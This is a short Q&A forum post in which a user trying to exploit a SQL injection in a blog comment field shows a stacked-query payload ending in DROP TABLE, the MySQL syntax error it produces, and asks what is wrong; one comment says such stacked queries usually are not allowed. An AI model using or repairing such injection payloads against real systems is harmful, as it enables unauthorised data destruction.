1064 error: You have an error in your SQL syntax;

Asked Feb 08 '22 at 10:02

Active Feb 08 '22 at 10:02

Viewed 12 times

I'm trying to exploit a sql injection. the target has a comment field, which it is used to INSERT data to a MySQL table. I receive this error, when I fill the field by a comma ':

Query: INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('name', ''', now() ) (0) [Exception]

So I put this piece as input:

something', now()); DROP TABLE blogs_table;--

and it's the result:

errno: 1064
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE blogs_table;-- ', now() )' at line 1
client_info: mysqlnd 7.4.3
host_info: 127.0.0.1 via TCP/IP

) Query: INSERT INTO blogs_table(blogger_name, comment, date) VALUES ('name', 'something', now()); DROP TABLE blogs_table;-- ', now() ) (0) [Exception]

Where is exactly wrong?

asked Feb 08 '22 at 10:02

Tom

Most APIs do not allow multiple query execution. this DROP TABLE is not a viable exploit but rather a fictional demonstration – Your Common Sense Feb 08 '22 at 10:04

1064 error: You have an error in your SQL syntax;

0 Answers0